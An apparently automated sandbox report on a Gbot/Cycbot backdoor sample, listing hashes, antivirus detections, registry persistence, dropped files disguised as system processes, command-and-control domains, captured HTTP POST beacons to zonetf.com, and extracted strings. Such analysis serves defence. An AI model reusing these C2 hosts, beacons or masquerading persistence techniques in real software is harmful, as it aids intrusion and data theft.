Analysis Date2014-12-06 03:05:57
MD533bfcc3c8f04d3a9477e3fcb3491c01a
SHA13e9009cb27ac6326ab26a6bcf05ba39bd3d1eb07

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: 7b4b0a57c796606b7528249fc10a1f87 sha1: 8fafc9f8a1db365452ff399fe5cda1dc497a20fc size: 103936
Section.rdata md5: 09b676466ee46af3533301059149c32c sha1: a93bcef124f96ee2364e97922385c2ba4a7fd601 size: 2048
Section.data md5: d8a0a74d5f6c2c9e6e40332239c8d8d1 sha1: 1c21fc85b5eec8635c22921568096913ca8e1d88 size: 59392
Section.isete md5: 49d047c7610da3ee10d0d5d18bdb2a29 sha1: f861947bf08134996b802fc9d5f43d25a83b231b size: 1024
Timestamp2005-09-16 17:19:30
VersionProductVersion: 1.0.0.3
FileVersion: 1.0.0.3
PrivateBuild: 1107
PEhasha06fc83ab5051daf537caeeb83e07db82dd8ca30
IMPhasha26cfff4f4121ecc6cb48335285ff9eb
AV360 SafeGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.G.gen!Eldorado
AVAvira (antivir)BDS/Gbot.aida
AVBullGuardGen:Trojan.Heur.KS.1
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Gbot-316
AVDr. WebBackDoor.Gbot.34
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.LZI
AVFortinetW32/FraudLoad.MK!tr
AVFrisk (f-prot)W32/Goolbot.G.gen!Eldorado
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)Cryptic.CMZ
AVIkarusBackdoor.Win32.Gbot
AVK7Backdoor ( 003210941 )
AVKasperskyBackdoor.Win32.Gbot.aid
AVMalwareBytesTrojan.Agent
AVMcafeeBackDoor-EXI.gen.i
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen3
AVTrend MicroBKDR_CYCBOT.SMX
AVVirusBlokAda (vba32)Backdoor.Gbot

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS127.0.0.1
Winsock DNSmyaquashoponline.com
Winsock DNSlostpropaganda.net
Winsock DNSmoremobileringtons.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSzonetf.com
Type: A
141.8.225.80
DNSzonetf.com
Type: A
141.8.225.80
DNSlostpropaganda.net
Type: A
DNSmyaquashoponline.com
Type: A
DNSmoremobileringtons.com
Type: A
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJsX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNwlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80

Raw Pcap

Strings
2".
.O
d..
.,..1
..
..2.4.
)..L.eT
[.
V.....<..h....f.Y0
..MR.^.q....@k]D .
.
=....
.
85..<
......
c..$a..l.
^I
[V
,

040904b0
1.0.0.3
1107
1C1Q
1Gr&
2`#bcd
2!G&
3$a&
`3DB
$BDC
C3s2
FDCB
#!fFP
FileVersion
jjjjjj
$"%p
@pDa
PrivateBuild
ProductVersion
RsFA`
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
0=NSZh
1*|&7*g
	1/W@b
202Fly
2<J5{b
}2rbFY
3	8Agjp
!3dB=q
3OYp|s
(44.Vf
4/<c~\
4.FTn.
->4vL2
&5,{S6
-*}@6}
\6	We}
_75|0t
7[h?.Y
>8Tlm-e
8_xM]1
+)*(9<
}92]oY
;}9_?c
9p0C8,9C
*@)AbL
ADVAPI32.dll
A>	Kb(
\AU_>8
BC@=qR
)+C5;z,
CharNextW
CharUpperW
C&*N(;
cnOg8$
CoCreateInstance
CoInitialize
CoRegisterClassObject
CoRevokeClassObject
CoTaskMemAlloc
CoTaskMemFree
CoTaskMemRealloc
CoUninitialize
cP);HK
CreateFileMappingW
CreateStdAccessibleObject
c<{;*w
D4N'dX
#D]7tK"[6
@.data
;DCzBa
d*e{oL
DispatchMessageW
d~ZM)U
/eH|CMJ
EnumResourceNamesA
EsN#3D
%%) @f
f778^Bl
FillConsoleOutputCharacterA
FindClose
fm~<Jd
Fo[ "!
FPXZ'#+
FreeEnvironmentStringsW
,F^tWh
g2(}t>
G8@`>8R(*
GetACP
GetCPInfo
GetLastError
GetMessageW
GetModuleHandleW
GetProcessWorkingSetSize
GetTickCount
&gjgSF
GlobalAlloc
GlobalFree
g)(U5f
)H\MvW
]h$^R@e
Igu~[= un
I~+HJ:}
i<m;*c
InitializeCriticalSection
.inuOB
.isete
J5h "L
JbTz:"<
"jMf@g
,JM{%q
]Jp#<;
jTagQr
jt)b,+
:jv"Zo
KERNEL32.dll
^kh/=QH
KillTimer
K*nL6<
?~L2At
l|`7xA
LockResource
 'l.q_
LresultFromObject
lstrcmpiW
lstrcpyA
lstrcpyW
lstrlenW
MultiByteToWideChar
m	vXWn
N7F!2)
N.HG/uX
!o;jfS
ole32.dll
OLEACC.dll
#OL;Si
OutputDebugStringW
PathCombineW
PathFileExistsW
p/'kQ;
PostThreadMessageW
p_Ps-:
~P(z `
Q1PU~s6r6
q=o+Ief
^`r|-]
`.rdata
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegDeleteValueW
RegEnumKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegSetValueExW
rY`G!=
]S>\6 
SendMessageA
SetTimer
SHLWAPI.dll
StringFromCLSID
StringFromGUID2
S>~vQP
?T<|5#
T\EexP
!This program cannot be run in DOS mode.
TJFHs"
tm&gI>MOj
TranslateMessage
TrW**U
ucBb@U
UezxR8
&u*F@Y
Uiy*q`
UnregisterClassA
-UpI}P
USER32.dll
uTMw_g
v7DOk0
 "%V<B
+Vd47^#t
ve=/L*W
v]lU=x>
=w>)}#
&w4X^0
WideCharToMultiByte
W)mLg"
?&wnj{M
wsprintfW
wyX=},
x2+/k#
'xD1cKI
xGiNTxI
xlY23q^
_xNf7-
&XYJ!s
YbiW#	
{YG8]-
yShMoz
>z4kDq
z5|9WB
Z;9^N=%-
z^=qJ 
zT*5kZ
z.T]#a
Z[*TI}Y